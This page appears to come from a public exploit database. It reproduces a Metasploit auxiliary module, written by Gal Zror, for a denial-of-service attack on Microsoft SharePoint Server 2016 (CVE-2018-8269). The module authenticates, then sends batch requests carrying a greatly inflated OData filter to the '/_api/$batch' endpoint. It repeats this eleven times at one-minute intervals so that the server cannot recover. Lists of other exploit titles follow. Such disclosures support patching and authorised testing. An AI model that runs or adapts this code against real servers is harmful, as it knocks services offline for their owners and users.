Menu

Search for hundreds of thousands of exploits

"Microsoft Office SharePoint Server 2016 - Denial of Service (Metasploit)"

Author

Exploit author

"Gal Zror"

Platform

Exploit platform

windows

Release date

Exploit published date

2019-01-09

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'sharepoint-ruby'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Remote::HttpClient


  def initialize(info = {})
    super(update_info(info,
        'Name'        => 'DOS Vulnerability in SharePoint 2016 Server',
        'Description'    => %q{
          A vulnerability in Microsoft SharePoint Server could allow a remote attacker to make the server unavailable.
          The vulnerability is a result of the dependency SharePoint has in Microsoft.Data.OData library which was 
          vulnerable to remote DOS (See CVE-2018-8269). The exploit is done by sending a crafted request that contains
          an OData filter that triggers the vulnerability in Microsoft.Data.OData library. Sending such request, will
          terminate the process that runs the server. By default, SharePoint server is configured to recover a
          terminated process, but it will do so only 10 times. If more than 10 malicious requests are sent in 5
          minutes interval, the server will not recover and will be down until it is manually restarted.
      },
      'Author'         =>
        [
          'Gil Mirmovitch', # Vulnerability discover and poc
          'Gal Zror'        # Metasploit module
        ],
      'Platform'    => 'win',
      'References'     =>
          [
              [ 'CVE', '2018-8269' ],
              [ 'ALEPH', '2018002' ]
          ],
      'Targets'     =>
          [
              [ 'Microsoft Office SharePoint Server 2016', { } ],
          ],

          ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('SSL',  [true, 'Negotiate SSL/TLS for outgoing connections', true]),
        OptString.new('USERNAME',  [true, 'The username to login with']),
        OptString.new('PASSWORD',  [true, 'The password to login with']),
        OptString.new('VHOST',  [true, 'HTTP server virtual host'])
      ], self.class)
      
  end

  def fetch_auth_cookie
    print_status("Fetching Authentication Cookie")
    begin
      site = Sharepoint::Site.new vhost, 'server-relative-site-url'
      site.session.authenticate datastore['USERNAME'], datastore['PASSWORD']
      return site.session.cookie
    rescue Sharepoint::Session::AuthenticationFailed
      fail_with(Failure::NoAccess, "Authentication failed")
    end
    print_good("Authentication Succeeded")
  end

  def extract_digest_value(cookie)
    token_api_uri = '/_api/contextinfo'
    res = send_request_cgi( {
                                'method' => 'POST',
                                'uri' => normalize_uri(token_api_uri),
                                'cookie' => cookie,
                            })
    if res.nil?
      fail_with(Failure::UnexpectedReply, "Empty context response")
    end
    res.get_xml_document.xpath('//d:FormDigestValue').text
  end

  def send_dos_request
    send_request(6100)
  end

  def send_innocent_request
    send_request(5)
  end

  def send_request(reps)
    vuln_api_uri = "/_api/$batch"
    cookie = datastore['COOKIE']

    data = Rex::MIME::Message.new
    data.add_part(
        "GET /_api/web/lists?$filter=true" + "+or+true" * reps + " HTTP/1.1\r\n" +
            "accept: application/json;odata.metadata=minimal\r\n", #Data is our payload
        'application/http',                                       #Content Type
        'binary',                                                 #Transfer Encoding
        nil                                                       #Content Disposition
    )
    send_request_cgi({
                           'method'   => 'POST',
                           'uri'      => normalize_uri(vuln_api_uri),
                           'ctype'  => "multipart/mixed; boundary=#{data.bound}",
                           'data'   => data.to_s,
                           'cookie' => cookie,
                           'headers'      => {
                               'x-requestdigest'	=> extract_digest_value(cookie),
                           }

                       })
  end

  def dos
    print_status("Sending DOS malicious requests...")
    (0..10).each {|i|
      print_status("Countdown #{10 - i}...")
      send_dos_request
      sleep(60)
    }

  end

  def check
    datastore['COOKIE'] = fetch_auth_cookie

    print_status("Sending innocent request...")
    res = send_innocent_request

    if res && res.code == 200
      print_good("Server responded 200 to innocent request")
    else
      print_bad("Server response " + res.code.to_s + " to innocent request")
      return Exploit::CheckCode::Unknown
    end

    print_status("Sending malicious request...")
    res = send_dos_request

    if res.nil?
      Exploit::CheckCode::Vulnerable
    else
      print_bad("Server response " + res.code.to_s + " to malicious request")
      Exploit::CheckCode::Safe
    end
  end

  def run
    if check == Exploit::CheckCode::Vulnerable
      dos
    end
  end
end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2019-01-09 "Microsoft Office SharePoint Server 2016 - Denial of Service (Metasploit)" dos windows "Gal Zror"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.